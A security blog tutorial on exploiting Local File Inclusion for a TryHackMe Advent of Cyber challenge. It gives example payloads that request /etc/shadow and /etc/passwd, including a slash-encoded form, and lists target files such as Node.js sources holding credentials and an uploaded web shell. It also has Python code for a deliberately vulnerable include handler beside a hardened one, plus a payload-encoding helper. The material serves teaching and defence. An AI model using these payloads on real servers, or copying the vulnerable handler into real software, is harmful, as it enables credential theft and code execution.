
How to exploit Website’s Local File Inclusion vulnerability?

by AnonyViet
January 25, 2023
in Security

This article explains what a Local File Inclusion (LFI) vulnerability is and how it can be used to read files from, and in some cases run code on, the server hosting a web application. You can use this knowledge to solve the Christmas Advent of Cyber challenge number 14.



How to exploit the Local File Inclusion vulnerability

Some web applications read a file from the server's filesystem and return its contents in the page. Others include the file in the document itself so that it is parsed and executed as part of the application's programming language (PHP's include(), for example).

For example, if a web application has the following path:

https://example.com/?include_file=file1.php

This request reads file1.php and displays its content on the page. If the application does not whitelist which files may be included through this parameter, a user can request /etc/shadow instead, the file that holds the password hashes of every local account on the system running the web application. On a correctly configured system /etc/shadow is readable only by root, so whether this works depends on the permissions discussed next; /etc/passwd, which is world-readable, is the usual first test.

When the web application includes a file, it reads it with the permissions of the user the web server runs as. If the server runs as user joe, the file is read with joe's permissions; if it runs as root, it is read with root's. Keep this in mind when choosing targets: start with a file you know the web server can read (robots.txt in the web root, if the site has one, or /etc/passwd) to confirm the application is vulnerable before trying protected files such as /etc/shadow.
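The handler described above, as an added example that is not code from the original article: a minimal Python model of a `?include_file=` endpoint in its vulnerable form beside a hardened form that whitelists the filename and checks the resolved path. A temporary directory stands in for the web root and for /etc, and the allowlist and sample shadow line are constructed for the demo.

```python
"""Added example (not code from the original article): a minimal model of the
``?include_file=`` handler described above, in its vulnerable form beside a
hardened form. A temporary directory stands in for the web root and for /etc,
so everything here is constructed and runs offline."""
import os
import tempfile

# Hypothetical allowlist of the only pages the handler is meant to include.
ALLOWED_INCLUDES = {"file1.php", "about.php"}


def include_file_vulnerable(docroot, requested):
    """No allowlist, no path check: behaves like a naive include($_GET['include_file']).

    os.path.join() drops `docroot` entirely when `requested` is absolute, and
    '..' segments are not rejected, so any file readable by the web server's
    user can be pulled in.
    """
    path = os.path.join(docroot, requested)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def include_file_hardened(docroot, requested):
    """Accept only a bare filename from the allowlist, then confirm the
    resolved path still lies inside the web root (defence in depth against
    symlinks or a mistaken allowlist entry)."""
    if requested != os.path.basename(requested) or requested not in ALLOWED_INCLUDES:
        raise PermissionError(f"include not allowed: {requested!r}")
    real_root = os.path.realpath(docroot)
    real_path = os.path.realpath(os.path.join(real_root, requested))
    if os.path.commonpath([real_root, real_path]) != real_root:
        raise PermissionError(f"path escapes web root: {requested!r}")
    with open(real_path, "r", encoding="utf-8") as fh:
        return fh.read()


def build_demo_fs():
    """Constructed filesystem: <tmp>/www as the web root and a fake
    <tmp>/etc/shadow. Returns (docroot, path_to_fake_shadow)."""
    base = tempfile.mkdtemp(prefix="lfi_demo_")
    docroot = os.path.join(base, "www")
    fake_etc = os.path.join(base, "etc")
    os.makedirs(docroot)
    os.makedirs(fake_etc)
    with open(os.path.join(docroot, "file1.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'legitimate page'; ?>\n")
    shadow = os.path.join(fake_etc, "shadow")
    with open(shadow, "w", encoding="utf-8") as fh:
        # Constructed sample line in /etc/shadow layout; the hash is not real.
        fh.write("root:$6$constructed$notarealhash:19000:0:99999:7:::\n")
    return docroot, shadow


def run_demo():
    """Exercise both handlers; returns a dict of outcomes keyed by case name."""
    docroot, shadow = build_demo_fs()
    outcome = {
        "vuln_legit": include_file_vulnerable(docroot, "file1.php"),
        "vuln_absolute": include_file_vulnerable(docroot, shadow),
        "vuln_traversal": include_file_vulnerable(docroot, "../etc/shadow"),
        "hard_legit": include_file_hardened(docroot, "file1.php"),
    }
    for case, payload in (("hard_absolute", shadow),
                          ("hard_traversal", "../etc/shadow"),
                          ("hard_nested", "file1.php/../../etc/shadow")):
        try:
            include_file_hardened(docroot, payload)
            outcome[case] = "ALLOWED (bug)"
        except PermissionError:
            outcome[case] = "blocked"
    return outcome


if __name__ == "__main__":
    for case, result in run_demo().items():
        print(f"{case:15} {result.strip()}")
```

The vulnerable handler hands back the fake shadow file both for an absolute path and for a `../` traversal, while the hardened one rejects anything that is not exactly one of the whitelisted names. The realpath check is the second layer: even if a whitelisted name were later turned into a symlink, the include would still be confined to the web root.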

Once a Local File Inclusion vulnerability is confirmed, the following files are worth requesting to take the attack further:

  • /etc/shadow – Password hashes of every local user on the system (only readable if the web server runs as root or otherwise has read access).
  • server.js or index.js – If the application is written in NodeJS, these are common filenames for the main application code and may expose API credentials or database connection strings.
  • /etc/hosts – Static hostname-to-IP mappings, which can reveal other internal hosts the web server communicates with.
  • /uploads/evil.php – If you can upload your own web shell to the server, including it through this vulnerability executes it. This requires the vulnerable code to use include/require, which parses the file as code, rather than a function that only reads and displays it.

Tips for completing the challenge

Some web servers treat every slash (/) in the URL as a path separator leading to a new page. So what happens when we want to reach a file such as /etc/shadow?

https://example.com/notes/?include=/etc/shadow

The server interprets this as a request for /notes/include/etc/shadow rather than passing /etc/shadow to the include parameter. So you cannot simply put raw slashes in the URL, because the web server treats them as a different directory.

The solution is URL encoding, which replaces characters that are unsafe in a URL with a '%' followed by two hexadecimal digits. A slash (/) is encoded as %2F, so the request becomes:

https://example.com/notes/?include=%2Fetc%2Fshadow

This request is routed to /notes/, and the application decodes each %2F back to a slash when it reads the parameter, so the include receives /etc/shadow.

https://meyerweb.com/eric/tools/dencoder/ is a handy URL encoder and decoder for building such payloads.
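The encoding step above, as an added example rather than code from the original article: a Python helper that builds the slash-encoded request, and a small offline model of the routing behaviour the article describes (a raw '/' in the query value is treated as a path separator), so you can check what the router and the application each see. The router model is a stand-in for the described behaviour, not any real server's code; the base URL and parameter name are the article's.

```python
"""Added example (not from the original article): build the slash-encoded
request from the section above and check, offline, what each side sees.
The router model below reproduces the behaviour the article describes (a raw
'/' in the query value is treated as a path separator); it is a stand-in,
not any real server's code."""
from urllib.parse import parse_qs, quote, urlsplit


def build_lfi_url(base, param, target):
    """Attach `target` to `base` as `param`, with every '/' encoded as %2F.

    quote() leaves '/' alone by default because it is legal in a path, so
    safe='' is required to get %2F."""
    return f"{base}?{param}={quote(target, safe='')}"


def _raw_param(url, param):
    """Return the still-encoded value of `param` exactly as it appears on the wire."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == param:
            return value
    return ""


def router_accepts(url, param):
    """Model of the front-end behaviour described in the article: a raw '/'
    inside the query value derails routing, so only slash-free values pass."""
    return "/" not in _raw_param(url, param)


def app_sees(url, param):
    """What the application receives after one round of percent-decoding,
    which is what a normal query-string parser does."""
    return parse_qs(urlsplit(url).query).get(param, [""])[0]


def compare(base, param, target):
    """Side by side: raw vs encoded request, as routed and as decoded."""
    raw_url = f"{base}?{param}={target}"
    enc_url = build_lfi_url(base, param, target)
    return {
        "raw_url": raw_url,
        "raw_routed": router_accepts(raw_url, param),
        "encoded_url": enc_url,
        "encoded_routed": router_accepts(enc_url, param),
        "app_receives": app_sees(enc_url, param),
    }


if __name__ == "__main__":
    for key, value in compare("https://example.com/notes/", "include", "/etc/shadow").items():
        print(f"{key:15} {value}")
```

The same helper works for traversal payloads such as `../../etc/passwd`, where only the slashes are encoded and the dots pass through unchanged. Note that `app_sees` decodes exactly once, as standard query parsers do; if a filter runs after decoding rather than before, single encoding will not get past it.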

Also, you can see how to solve shodan.io on TryHackMe here.
